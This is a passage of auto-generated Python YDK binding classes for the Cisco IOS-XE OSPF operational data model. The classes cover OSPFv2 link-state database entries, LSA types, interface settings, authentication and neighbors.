self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa()
self.nssa_lsa.parent = self
self._children_name_map["nssa_lsa"] = "nssa-lsa"
self.ospfv2_router_lsa_links = YList(self)
self._segment_path = lambda: "ospfv2-lsdb-area" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value)
class Ospfv2RouterLsaLinks(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, self).__init__()
self.yang_name = "ospfv2-router-lsa-links"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_type','link_id','link_data']
self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo))])
self._leafs = OrderedDict([
('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
])
self.link_type = None
self.link_id = None
self.link_data = None
self.link_topo = YList(self)
self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value)
class LinkTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, self).__init__()
self.yang_name = "link-topo"
self.yang_parent_name = "ospfv2-router-lsa-links"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "link-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value)
class UnsupportedLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, self).__init__()
self.yang_name = "unsupported-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])),
])
self.lsa_data = []
self._segment_path = lambda: "unsupported-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, ['lsa_data'], name, value)
class RouterLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, self).__init__()
self.yang_name = "router-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])),
('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])),
])
self.router_lsa_bits = Bits()
self.router_lsa_number_links = None
self._segment_path = lambda: "router-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value)
class NetworkLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, self).__init__()
self.yang_name = "network-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])),
('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])),
])
self.network_lsa_mask = None
self.network_attached_routers = []
self._segment_path = lambda: "network-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value)
class NetworkSummaryLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, self).__init__()
self.yang_name = "network-summary-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo))])
self._leafs = OrderedDict([
('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
])
self.summary_lsa_mask = None
self.summary_topo = YList(self)
self._segment_path = lambda: "network-summary-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, ['summary_lsa_mask'], name, value)
class SummaryTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, self).__init__()
self.yang_name = "summary-topo"
self.yang_parent_name = "network-summary-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "summary-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
class RouterSummaryLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, self).__init__()
self.yang_name = "router-summary-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo))])
self._leafs = OrderedDict([
('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
])
self.summary_lsa_mask = None
self.summary_topo = YList(self)
self._segment_path = lambda: "router-summary-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, ['summary_lsa_mask'], name, value)
class SummaryTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, self).__init__()
self.yang_name = "summary-topo"
self.yang_parent_name = "router-summary-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "summary-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
class ExternalLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, self).__init__()
self.yang_name = "external-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo))])
self._leafs = OrderedDict([
('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
])
self.external_lsa_mask = None
self.external_topo = YList(self)
self._segment_path = lambda: "external-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, ['external_lsa_mask'], name, value)
class ExternalTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, self).__init__()
self.yang_name = "external-topo"
self.yang_parent_name = "external-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
])
self.mt_id = None
self.topo_metric_type = None
self.topo_metric = None
self.topo_forwarding_address = None
self.topo_route_tag = None
self._segment_path = lambda: "external-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
class NssaLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, self).__init__()
self.yang_name = "nssa-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo))])
self._leafs = OrderedDict([
('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
])
self.external_lsa_mask = None
self.external_topo = YList(self)
self._segment_path = lambda: "nssa-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, ['external_lsa_mask'], name, value)
class ExternalTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, self).__init__()
self.yang_name = "external-topo"
self.yang_parent_name = "nssa-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
])
self.mt_id = None
self.topo_metric_type = None
self.topo_metric = None
self.topo_forwarding_address = None
self.topo_route_tag = None
self._segment_path = lambda: "external-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
class Ospfv2Interface(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, self).__init__()
self.yang_name = "ospfv2-interface"
self.yang_parent_name = "ospfv2-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([("ttl-security-val", ("ttl_security_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal)), ("auth-val", ("auth_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal)), ("ospfv2-neighbor", ("ospfv2_neighbor", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor))])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])),
('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])),
('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])),
('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])),
('prefix_suppresion', (YLeaf(YType.boolean, 'prefix-suppresion'), ['bool'])),
('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])),
('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])),
('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])),
('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])),
('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])),
('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])),
('dr', (YLeaf(YType.uint32, 'dr'), ['int'])),
('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])),
('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])),
('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])),
('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2IntfState', '')])),
])
self.name = None
self.network_type = None
self.enable = None
self.passive = None
self.demand_circuit = None
self.mtu_ignore = None
self.prefix_suppresion = None
self.cost = None
self.hello_interval = None
self.dead_interval = None
self.retransmit_interval = None
self.transmit_delay = None
self.hello_timer = None
self.wait_timer = None
self.dr = None
self.bdr = None
self.dr_ip = None
self.bdr_ip = None
self.state = None
self.ttl_security_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal()
self.ttl_security_val.parent = self
self._children_name_map["ttl_security_val"] = "ttl-security-val"
self.auth_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal()
self.auth_val.parent = self
self._children_name_map["auth_val"] = "auth-val"
self.ospfv2_neighbor = YList(self)
self._segment_path = lambda: "ospfv2-interface" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, ['name', 'network_type', 'enable', 'passive', 'demand_circuit', 'mtu_ignore', 'prefix_suppresion', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'state'], name, value)
class TtlSecurityVal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, self).__init__()
self.yang_name = "ttl-security-val"
self.yang_parent_name = "ospfv2-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
('hops', (YLeaf(YType.int32, 'hops'), ['int'])),
])
self.enable = None
self.hops = None
self._segment_path = lambda: "ttl-security-val"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, ['enable', 'hops'], name, value)
class AuthVal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, self).__init__()
self.yang_name = "auth-val"
self.yang_parent_name = "ospfv2-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("auth-key", ("auth_key", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey)), ("key-chain", ("key_chain", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain))])
self._leafs = OrderedDict([
('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])),
])
self.no_auth = None
self.auth_key = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey()
self.auth_key.parent = self
self._children_name_map["auth_key"] = "auth-key"
self.key_chain = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain()
self.key_chain.parent = self
self._children_name_map["key_chain"] = "key-chain"
self._segment_path = lambda: "auth-val"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, ['no_auth'], name, value)
class AuthKey(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, self).__init__()
self.yang_name = "auth-key"
self.yang_parent_name = "auth-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('key_id', (YLeaf(YType.uint8, 'key-id'), ['int'])),
('key_string', (YLeafList(YType.uint8, 'key-string'), ['int'])),
('crypto_algo', (YLeaf(YType.enumeration, 'crypto-algo'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2CryptoAlgorithm', '')])),
])
self.key_id = None
self.key_string = []
self.crypto_algo = None
self._segment_path = lambda: "auth-key"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, ['key_id', 'key_string', 'crypto_algo'], name, value)
class KeyChain(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, self).__init__()
self.yang_name = "key-chain"
self.yang_parent_name = "auth-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('key_chain', (YLeafList(YType.uint8, 'key-chain'), ['int'])),
])
self.key_chain = []
self._segment_path = lambda: "key-chain"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, ['key_chain'], name, value)
class Ospfv2Neighbor(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, self).__init__()
self.yang_name = "ospfv2-neighbor"
self.yang_parent_name = "ospfv2-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['nbr_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('nbr_id', (YLeaf(YType.uint32, 'nbr-id'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str','str'])),
('dr', (YLeaf(YType.uint32, 'dr'), ['int'])),
('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])),
('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])),
('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])),
('event_count', (YLeaf(YType.uint32, 'event-count'), ['int'])),
('retrans_count', (YLeaf(YType.uint32, 'retrans-count'), ['int'])),
('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])),
('dead_timer', (YLeaf(YType.uint32, 'dead-timer'), ['int'])),
])
self.nbr_id = None
self.address = None
self.dr = None
self.bdr = None
self.dr_ip = None
self.bdr_ip = None
self.event_count = None
self.retrans_count = None
self.state = None
self.dead_timer = None
self._segment_path = lambda: "ospfv2-neighbor" + "[nbr-id='" + str(self.nbr_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, ['nbr_id', 'address', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'event_count', 'retrans_count', 'state', 'dead_timer'], name, value)
class Ospfv2LsdbExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, self).__init__()
self.yang_name = "ospfv2-lsdb-external"
self.yang_parent_name = "ospfv2-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type','lsa_id','advertising_router']
self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])),
('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])),
('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])),
('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])),
('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])),
('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])),
('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])),
])
self.lsa_type = None
self.lsa_id = None
self.advertising_router = None
self.lsa_age = None
self.lsa_options = Bits()
self.lsa_seq_number = None
self.lsa_checksum = None
self.lsa_length = None
self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa()
self.unsupported_lsa.parent = self
self._children_name_map["unsupported_lsa"] = "unsupported-lsa"
self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa()
self.router_lsa.parent = self
self._children_name_map["router_lsa"] = "router-lsa"
self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa()
self.network_lsa.parent = self
self._children_name_map["network_lsa"] = "network-lsa"
self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa()
self.network_summary_lsa.parent = self
self._children_name_map["network_summary_lsa"] = "network-summary-lsa"
self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa()
self.router_summary_lsa.parent = self
self._children_name_map["router_summary_lsa"] = "router-summary-lsa"
self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa()
self.external_lsa.parent = self
self._children_name_map["external_lsa"] = "external-lsa"
self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa()
self.nssa_lsa.parent = self
self._children_name_map["nssa_lsa"] = "nssa-lsa"
self.ospfv2_router_lsa_links = YList(self)
self._segment_path = lambda: "ospfv2-lsdb-external" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value)
class Ospfv2RouterLsaLinks(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, self).__init__()
self.yang_name = "ospfv2-router-lsa-links"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_type','link_id','link_data']
self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo))])
self._leafs = OrderedDict([
('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
])
self.link_type = None
self.link_id = None
self.link_data = None
self.link_topo = YList(self)
self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value)
class LinkTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, self).__init__()
self.yang_name = "link-topo"
self.yang_parent_name = "ospfv2-router-lsa-links"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "link-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value)
class UnsupportedLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, self).__init__()
self.yang_name = "unsupported-lsa"
